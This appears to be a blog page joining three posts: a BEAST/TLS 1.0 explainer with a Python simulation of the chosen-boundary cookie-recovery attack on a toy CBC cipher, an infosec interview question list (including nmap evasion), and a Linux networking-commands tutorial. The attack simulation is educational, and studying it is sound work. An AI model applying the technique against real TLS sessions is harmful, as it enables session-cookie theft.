If you apply our “CHOICE #2” recommended configuration you will not be able to use your FIPS-validated AES or TripleDES algorithms on your SSL/TLS connections.  RC4 is an older algorithm, not FIPS-validated, that browsers and servers often negotiate by default.  (RC6, RC4's successor, was one of the five finalists in the open AES competition about a decade ago.)  Bear in mind that CHOICE #2 reflects the state of play when BEAST was announced in 2011: keystream biases in RC4 published in 2013 made it attackable in TLS as well, and RFC 7465 (2015) prohibits RC4 cipher suites in TLS altogether.  Today the only defensible option is CHOICE #1, ideally TLS v1.2 with AEAD (GCM) cipher suites, which are exposed to neither problem.
“BEAST requires about two seconds to decrypt each byte of an encrypted cookie. That means authentication cookies of 1,000 to 2,000 characters long will still take a minimum of a half hour for their PayPal attack to work. Nonetheless, the technique poses a threat to millions of websites that use earlier versions of TLS, particularly in light of (the researchers’) claim that this time can be drastically shortened.
The decryption process is fast enough that it’s likely imperceptible to users, and the researchers said that in a targeted attack, they likely could steal the cookie from a specific site within five minutes of loading the tool. Rizzo and Duong said that their attack exploits a vulnerability in the TLS 1.0 protocol that has been known for quite some time, but was thought to be unexploitable.”
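The quoted figures make more sense once you see the mechanism, and the mechanism is also why the recommendations above turn on the TLS version rather than on any particular product. The following simulation is an added example written for this page; it is not code from the original article or from Rizzo and Duong. It models a CBC record layer whose IV is chained from the previous record (SSL 3.0 / TLS 1.0) and runs the blockwise chosen-boundary attack that BEAST is built on: the attacker lines up one unknown cookie byte at the end of a block of otherwise known bytes, then sends crafted records of his own and compares ciphertext blocks, burning at most 256 records per recovered byte. The block cipher is a toy Feistel construction standing in for AES (the attack does not care which cipher CBC wraps), the cookie value is a constructed sample, and the names CbcRecordLayer, beast_recover and demo are this example's own. Switching chained_iv off gives each record a fresh random IV, as TLS 1.1 and later do, and the same attack recovers nothing.

```python
import hashlib
import os

BLOCK = 16  # 128-bit blocks, as with AES


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    # Constructed for this demo: a 4-round Feistel network with a SHA-256 round
    # function, i.e. a keyed permutation on 16-byte blocks standing in for AES.
    assert len(block) == BLOCK
    left, right = block[:8], block[8:]
    for rnd in range(4):
        f = hashlib.sha256(key + bytes([rnd]) + right).digest()[:8]
        left, right = right, _xor(left, f)
    return left + right


class CbcRecordLayer:
    """CBC-mode record layer as the attacker sees it.

    chained_iv=True : each record's IV is the last ciphertext block of the previous
                      record (SSL 3.0 / TLS 1.0), which the attacker has already seen
                      on the wire before choosing his next plaintext.
    chained_iv=False: each record gets a fresh random explicit IV (TLS 1.1+)."""

    def __init__(self, key: bytes, chained_iv: bool = True):
        self.key = key
        self.chained_iv = chained_iv
        self.last_block = os.urandom(BLOCK)  # initial IV agreed in the handshake

    def send(self, plaintext: bytes):
        # Zero-pad to a block boundary; real TLS padding plays no part in the attack.
        plaintext += b"\x00" * (-len(plaintext) % BLOCK)
        iv = self.last_block if self.chained_iv else os.urandom(BLOCK)
        prev, out = iv, []
        for i in range(0, len(plaintext), BLOCK):
            prev = toy_block_encrypt(self.key, _xor(plaintext[i:i + BLOCK], prev))
            out.append(prev)
        self.last_block = prev
        return iv, b"".join(out)


def beast_recover(channel: CbcRecordLayer, victim_send, secret_len: int) -> bytes:
    """Blockwise chosen-boundary attack, the core of BEAST.

    victim_send(prefix) models the browser sending prefix + SECRET (an attacker-chosen
    URL path followed by the Cookie header) and returns the (iv, ciphertext) captured
    on the wire. Between victim records the attacker may send records of his own."""
    known = b""
    for i in range(secret_len):
        # Choose the prefix length so that secret[i] is the LAST byte of a block whose
        # other 15 bytes (prefix + already recovered secret bytes) are known.
        pad_len = (BLOCK - 1 - i) % BLOCK
        prefix = b"A" * pad_len
        iv, ct = victim_send(prefix)
        t = (pad_len + i) // BLOCK
        blocks = [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]
        target, c_prev = blocks[t], (iv if t == 0 else blocks[t - 1])
        known_part = (prefix + known)[t * BLOCK:]  # the 15 known bytes of the block
        found = None
        for g in range(256):
            guess = known_part + bytes([g])
            # The next record will be chained to channel.last_block, so sending
            # last_block ^ c_prev ^ guess makes the cipher compute E(c_prev ^ guess),
            # which is exactly the target block if the guess is right.
            crafted = _xor(_xor(channel.last_block, c_prev), guess)
            _, probe = channel.send(crafted)
            if probe[:BLOCK] == target:
                found = g
                break
        if found is None:  # no match: the IV was not predictable (TLS 1.1+)
            break
        known += bytes([found])
    return known


SECRET = b"JSESSIONID=7f3a9c0e1b2d4e6f"  # constructed sample cookie value


def demo(chained_iv: bool = True, secret: bytes = SECRET) -> bytes:
    channel = CbcRecordLayer(os.urandom(32), chained_iv=chained_iv)
    victim_send = lambda prefix: channel.send(prefix + secret)
    return beast_recover(channel, victim_send, len(secret))


if __name__ == "__main__":
    print("TLS 1.0 style (chained IV):  ", demo(True))
    print("TLS 1.1 style (random IV):   ", demo(False))
```

Each recovered byte costs the attacker at most 256 records of his own plus one victim request, which is where the "seconds per byte" budget in the quote comes from; the TLS v1.1 explicit per-record IV breaks the attack at the first byte because the attacker can no longer predict the IV his crafted block will be XORed with. The 1/n-1 record splitting that the browser patches listed below implement achieves the same effect on TLS v1.0 from the client side.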

What web browsers have been patched against this?

  • Opera is now patched!  (article)  It also supports TLS v1.1 – another fine choice!
  • IE is now patched! (article)
  • Google Chrome will soon have a BEAST patch ready (article)
  • Firefox has NOT yet promised a BEAST patch (article)
    • However, Oracle provided a Java plug-in patch for Firefox to make the most common exploit harder (article)
  • CANNOT FIND any information about Safari/Webkit recognizing BEAST (please send me links!)

A relatively fresh list of browsers that support TLS v1.1 and later is maintained here:
http://en.wikipedia.org/wiki/Transport_Layer_Security#Browser_implementations
Currently only Opera (version 10 or higher) and IE (version 8 or higher on Windows 2008 R2 or Windows 7) are listed with TLS v1.1 support.  Firefox does not currently support TLS v1.1, nor does Chrome or Safari.   However pressure to add TLS v1.1 support to those browsers has increased substantially since BEAST was announced.

What are some of the servers that support TLS v.1.1?

Microsoft IIS 7 (on Windows 2008 R2) supports TLS v.1.1 but it is off by default and must be explicitly enabled through the SChannel registry keys (HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Server, with Enabled set to 1 and DisabledByDefault set to 0, followed by a reboot).  (This affects web transfer applications that rely on IIS such as Ipswitch’s WS_FTP Server Web Transfer Module, WS_FTP Server Ad Hoc Module and MOVEit DMZ.)
Many other file transfer vendors ship their own web servers with their products – check with your vendor for specific guidance.

This post is taken from http://www.filetransferconsulting.com

infosec interview questions

1) What do you see as the most critical current threats affecting Internet-accessible websites?
2) What online resources do you use to keep abreast of web security issues?
3) Give an example of recent security vulnerability or threat?
4) Difference between a threat, vulnerability and risk?
5) What do you see as challenges to successfully deploying/monitoring web intrusion detection?
6) Definition of XSS and its impact on servers and clients?
7) What are the important steps you would recommend to secure a new web application and web server?
8) What is DOM based XSS?
9) What is Blind SQL injection?
10) Where do you get security news from?
11) If you had to both encrypt and compress data during transmission, which would you do first, and why?
12) Difference between HTTP and HTML?
13) Difference between stored and reflected XSS?
14) Common defenses against XSS?
15) Difference between Stateful and Stateless firewall?
16) What kind of network do you have at home?
17) On what port does ping work?
18) Explain CSRF?
19) How to defend against CSRF?
20) Difference between XSS and CSRF?
21) As a corporate Information Security professional, what’s more important to focus on: threats or vulnerabilities?
22) What are Linux’s strengths and weaknesses vs. Windows?
23) What’s the difference between Diffie-Hellman and RSA?
24) What kind of attack is a standard Diffie-Hellman exchange vulnerable to? 
25) What’s the goal of information security within an organization?
26) Are open-source projects more or less secure than proprietary ones?
27) What’s the difference between encoding, encryption, and hashing?
28) What is salting?
29) Who do you look up to within the field of Information Security? Why?
30) What is NMAP? Show some nmap commands.(avoid firewall/ids, noping etc.,)
31) What is Key Escrow?
32) What is nonce?
33) What does RSA stand for?
34) What is DES?
35) What is triple DES?
36) What is the difference between Symmetric and Asymmetric?
37) How does HTTP handle state?
38)  In public-key cryptography you have a public and a private key, and you often perform both encryption and signing functions. Which key is used for which?
39) How exactly does traceroute/tracert work at the protocol level?
40) What is a Buffer Overflow?
41) What is a NOP Sled?
42) Design a secure network
43) How do you securely link two offices together?
44) What is the security threat level today at the Internet Storm Center (ISC)?
45) What is SSL?
46) How do you create SSL certificates, generically speaking?
47) What is DNS Hijacking?
48) What is the latest security breach you’re aware of?
49) Have you hacked any system?
50) Can a Virtual Operating System be compromised?
51) What is UPX?
52) What is meterpreter?
53) What is LDAP?
54) Why is LDAP called Light weight?
55) What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP and Global Catalog?
56) What are rainbow tables?
57) What is dsniff?
58) Other than Wireshark, what sniffers have you used?
59) What was the last course you attended? Where? When? Why?
60) What was the last technical book you read?
61) Describe the last security implementation you were involved with.
62) What is a honeypot?
63) Are there limitations of Intrusion Detection Signatures?
64) Describe TCP 3-way Handshake?
65) Difference between pen testing and vulnerability assessment?
66) Difference between vulnerability and mitigation?
67) Give me an example of a vulnerability at each layer of the OSI reference model.
68) Give me a type of mitigation for each of the vulnerabilities you have just provided.
69) OSI(Open System Interconnection) model
70) What is MITM?
71) What is a Syn Flood attack, and how to prevent it?
72) What’s the difference between a router, a bridge, a hub and a switch?
73) Your network has been infected by malware. Please walk me through the process of cleaning up the environment.
74) What’s the difference between a Proxy and a Firewall?
75) Why should I use server certificates on my e-commerce website?

76) What’s port scanning and how does it work?
77) Process of pen testing a system
78) What is NAT and how does it work?
79) What is false positive and false negative?
80) Please detail 802.1x security vs. 802.11 security
81) How would you harden a Windows Server? What about a Linux Server?
82) What are the latest threats you foresee for the near future?
83) What is ISO 27001 and why should a company adopt it?
84) What is the Microsoft Baseline Security Analyzer?
85) Define Security 
86) MAC OS vs. WINDOWS
87) Ping uses TCP or UDP?
88) Explain Authentication and authorization?
89) What is a Brute force attack?
90) What is meant by client-side scripting?
91) What is a cookie?
92) Explain DOS, DDOS
93) What is directory traversal attack?
94) What is meant by reconnaissance?
95) What is forced browsing?
96) What is meant by session ID?
97) Define Web application?
98) What is meant by WAF?
99) Explain different types of hackers?
100) what are the different types of penetration testing?
101) Explain CIA triad
102) what are Google hacks/dorks?
103) List out OWASP top 10
104) Define Hacking? What is ethical hacking?
105) what are the various penetration testing methodologies?
106) what is social engineering?
107) In the context of Metasploit, explain what is meant by exploit, payload, auxiliary, encoders, NOP, post
108) what are root kits?
109) Explain Steganography
110) Difference between autopwn and armitage
111) what is meant by backdooring?
112) what is INCIDENT RESPONSE?
113) what is chain of custody?
114) what are the different port’s used commonly and list out their port no’s?
115) what is imaging?
116) what is padding?
117) what is pivoting?
118) what is SSH, FTP, TLS?
119) what is HTTP response splitting?
120) what is RFI, LFI?
121) what do you know about encryption?
122) Can CSRF be done for POST and GET methods?
123) what encryption does the SSL certificate of a website use?
124) Difference between public and private key?
125) what is chain of custody?
126) what is meant by incident response?
127) what is hacktivism?
128) what is a firewall? types of firewall?
129) what is ssl, how do you create ssl certificates?
130) what is a spoofed packet
131) what is IDS or IDP? Give example?
132) what would you do if your system is compromised?
133) what is web-caching?
134) what is use of proxy servers?
135) what would you do if your network device is compromised?
136) what is GPG/PGP?
137) what is log host?
138) how do you manage a firewall?
139) if you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
140) Why we use firewall for security when we have facilities like access-list on routers ?
141) what is the difference between an SSL connection and an SSL session?
142) List and briefly define four techniques used to avoid guessable passwords.
143) what is a salt in the context of UNIX password management?
144) what is the difference between rule-based anomaly detection and rule-based penetration identification?
145) what is the difference between statistical anomaly detection and rule-based intrusion detection?
146) Describe SOAP and WSDL
147) what protocols comprise SSL?
148) what are hidden fields in HTTP?
149) what steps are involved in the SSL Record Protocol transmission?
150) what is file enumeration?
151) what tools can you use to validate the strength of SID (session ID)?
152) what is phishing attack?
153) what is cookie gathering?
154) what is a dual signature and what is its purpose?
155) how can you ensure that all input fields are properly validated to prevent code injection attacks?
156) why do we need port scanning?
157) what are format string vulnerabilities?
158) Example of broken authentication and command injection
159) what is sql injection?
160) what are fuzzers?
161) what is runtime inspection?
162) what is ISO 17799
163) what is integer overflow?
164) what type of security testing have you performed? 
165) what is ARP spoofing?
166) During an audit, an interviewee is not disclosing the information being requested. How would you overcome this situation? 
167) Why should I use server certificates on my e-commerce website? 
168) Can a server certificate prevent SQL injection attacks against your system? Please explain.
169) What are the most common application security flaws?
170) What do you understand by layered security approach? 
171) Difference between virus, Trojan, spyware, malware and a worm
172) Can Linux be compromised? How secure is Linux? How would you compromise a LINUX system?
173) What do you do if you are a victim of a DoS attack?
174) What is a log host?
175) what are the security functions of SSL?
176) what is a 0 by 90 bytes error.
177) what is the problem of having a predictable sequence of bits in TCP/IP?
178) what is heap memory?
179) what is a system call?
180) what is 2 factor authentication?
181) what is IIS lockdown tool?
182) what is disaster recovery?
183) what is a null session?
184) what is incident management?
185) what is SAM (Security Account Manager)?
186) what is a SID (Security ID)?
187) what is the difference between TCP and IP?
188) what is the difference between TCP and UDP?
189) Explain IP Address?
190) what is Public IP and Private IP?
191) Define subnet mask, default gateway, loopback address and IPID?
192) what is Hypertext Transfer Protocol (HTTP)? What are request methods?
193) Difference between IPv4 and IPv6
194) what is the difference between stateful and stateless protocol? Explain with example?
195) how would you prevent man-in-the-middle attacks?
196) Example, recommendation and affect of DOM based XSS?
197) what is XSP(Cross site printing)?
198) Describe OSPF routing?
199) what are the consequences of HTTP trace request?
200) what is session hijacking?
201) how would you convince a client to use your security product?
202) how do you secure a Wi-Fi network?
203) what is a protocol, socket and port?
204) what is your area of expertise and why?
205) what is the difference between routing protocols and routed protocols?
206) Difference between session and cookie?

Top 10 basic networking commands in linux/unix

Networking is an essential part of Unix, and it offers plenty of tools and commands to diagnose networking problems. When I was working on FIX Protocol connectivity we got a lot of support queries about whether FIX sessions were connected or not. Since FIX Protocol runs over TCP sockets, you can use netstat, telnet and the other networking commands available in Linux to find and solve such problems. In this article I will show you the basic networking commands in Unix and what they are used for; combined with grep and find, they let you troubleshoot most networking problems.

Networking Commands Example in Unix and Linux

These are the most useful commands in my list while working on a Linux server; they let you quickly troubleshoot connection issues, e.g. whether another system is connected or not and whether another host is responding or not. While working on FIX connectivity for an advanced trading system these tools saved quite a lot of time.
  • finding host/domain name and IP address – hostname
  • testing a network connection – ping
  • getting the network configuration – ifconfig
  • network connections, routing tables, interface statistics – netstat
  • querying DNS – nslookup
  • communicating with another host and checking that a port on it is reachable – telnet
  • the routing steps that packets take to get to a network host – traceroute
  • viewing user information – finger

Example of Networking commands in Unix

Let's see some examples of the various networking commands in Unix and Linux. Some of them are quite basic, e.g. ping and telnet, and some are more powerful, e.g. nslookup and netstat. When you use these commands in combination with find and grep you can get whatever you are looking for, e.g. hostname, connection end points, connection status etc.


hostname

hostname with no options displays the machine's host name
hostname -d  displays the domain name the machine belongs to
hostname -f  displays the fully qualified host and domain name
hostname -i  displays the IP address for the current machine


ping
ping sends ICMP echo request packets to a user-specified destination; if the packets are received, the destination device sends echo replies back. Ping can be used for two purposes:

1. To ensure that a network connection can be established.
2. To get timing information (round-trip time) about the connection.

If you do ping www.yahoo.com it will display its IP address along with the reply times. Use Ctrl+C to stop the test. Bear in mind that many hosts and firewalls drop ICMP, so a failed ping does not prove that a host is down; a TCP connection to the service port (see telnet below) is more conclusive.

ifconfig
View the network configuration: ifconfig displays the current network adapter configuration. It is handy for determining whether you are getting transmit (TX) or receive (RX) errors. On current distributions ifconfig (net-tools) is often not installed; ip addr and ip -s link from iproute2 show the same information.


netstat
The most useful and versatile command for finding connections to and from the host. You can find out all the multicast groups subscribed by this host by issuing "netstat -g".

netstat -nap | grep port   displays the process id of the application which is using that port (run as root to see other users' processes)
netstat -a or netstat --all   displays all connections, including TCP and UDP
netstat --tcp or netstat -t   displays only TCP connections
netstat --udp or netstat -u   displays only UDP connections
netstat -g   displays all multicast groups subscribed by this host

On current distributions netstat (net-tools) is frequently absent; ss from iproute2 gives the same views (ss -tan for TCP connections, ss -ltnp for listening ports with their owning processes).

nslookup
nslookup queries DNS: given a domain name it displays all the IP addresses registered for it, and given an IP address it displays the hostname (a reverse lookup). You must have a connection to a resolver for this utility to be useful.
E.g. nslookup blogger.com

So you can use nslookup both to convert a hostname to IP addresses and an IP address to a hostname. Note that it asks the DNS server directly and bypasses /etc/hosts, so its answer can differ from what applications on the box actually resolve; getent hosts name shows the system resolver's view.

traceroute
A handy utility to view the number of hops and response time to get to a remote system or web site is traceroute. Again you need an internet connection to make use of this tool.


finger
View user information: finger displays a user’s login name, real name, terminal name and write status. This is a pretty old Unix command and rarely used nowadays; the fingerd service it queries on remote hosts is normally disabled because it leaks account information.

telnet
telnet connects to a destination host using the Telnet protocol; if a TCP connection is established on any port, the network path between the two hosts is working.
telnet hostname port connects to hostname on the specified port. It is normally used to check whether a host is alive and the network connection to a service is fine. Telnet itself is a cleartext protocol and is only being used here as a TCP connect test; where it is not installed, nc -zv hostname port does the same job.
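The three checks that come up most often in the support queries described above (what does the name resolve to, does the service port accept a TCP connection, and which sockets on this box are using that port) can be scripted so they run the same way on every server, including ones where telnet and netstat are not installed. The following is an added example written for this page, not code from the original post; the function names resolve, tcp_probe, parse_proc_net_tcp, port_users and demo are this example's own, and the /proc/net/tcp sample it parses is constructed (a listener on 127.0.0.1:8080 plus one established connection to it). Parsing /proc/net/tcp is exactly what netstat -tan does on Linux, so it shows where the numbers in the netstat output come from.

```python
import socket
import struct

# /proc/net/tcp state codes (Linux include/net/tcp_states.h)
TCP_STATES = {
    1: "ESTABLISHED", 2: "SYN_SENT", 3: "SYN_RECV", 4: "FIN_WAIT1",
    5: "FIN_WAIT2", 6: "TIME_WAIT", 7: "CLOSE", 8: "CLOSE_WAIT",
    9: "LAST_ACK", 10: "LISTEN", 11: "CLOSING",
}

# Constructed sample of /proc/net/tcp: a listener on 127.0.0.1:8080 and one
# established connection to it from 127.0.0.1:50000.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:1F90 0100007F:C350 01 00000000:00000000 00:00000000 00000000  1000        0 12346 1 0000000000000000 20 4 30 10 -1
"""


def resolve(name: str) -> list:
    """nslookup equivalent: every address the system resolver returns for name."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(name, None)})


def tcp_probe(host: str, port: int, timeout: float = 3.0) -> bool:
    """'telnet host port' as a pure connectivity test: does the TCP handshake complete?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable, resolution failure
        return False


def _proc_addr(field: str):
    # The kernel writes the IPv4 address as little-endian hex and the port as hex.
    ip_hex, port_hex = field.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16))), int(port_hex, 16)


def parse_proc_net_tcp(text: str) -> list:
    """What netstat -tan reads under the hood: rows of ((lip, lport), (rip, rport), state)."""
    rows = []
    for line in text.splitlines()[1:]:  # skip the header line
        parts = line.split()
        if len(parts) < 4:
            continue
        state = TCP_STATES.get(int(parts[3], 16), parts[3])
        rows.append((_proc_addr(parts[1]), _proc_addr(parts[2]), state))
    return rows


def port_users(text: str, port: int) -> list:
    """netstat -nap | grep port analogue: sockets with port on either end."""
    return [r for r in parse_proc_net_tcp(text) if port in (r[0][1], r[1][1])]


def demo() -> tuple:
    """Open a throwaway listener, probe it, close it, probe again: (True, False)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the kernel pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    while_up = tcp_probe("127.0.0.1", port)
    listener.close()
    after_close = tcp_probe("127.0.0.1", port)
    return while_up, after_close


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 22
    print("addresses:", resolve(host))
    print("tcp %s:%d reachable: %s" % (host, port, tcp_probe(host, port)))
    try:
        with open("/proc/net/tcp") as f:  # Linux only; IPv6 sockets are in /proc/net/tcp6
            for row in port_users(f.read(), port):
                print(row)
    except OSError:
        pass
```

Run it as python3 netcheck.py fixgateway.example 9878 (hostname and port are whatever you need to check) and the three answers come out in one go. tcp_probe returning False while resolve succeeds points at a firewall or a service that is not listening; a SYN_SENT row from port_users on the client side means the SYN left the box and nothing came back.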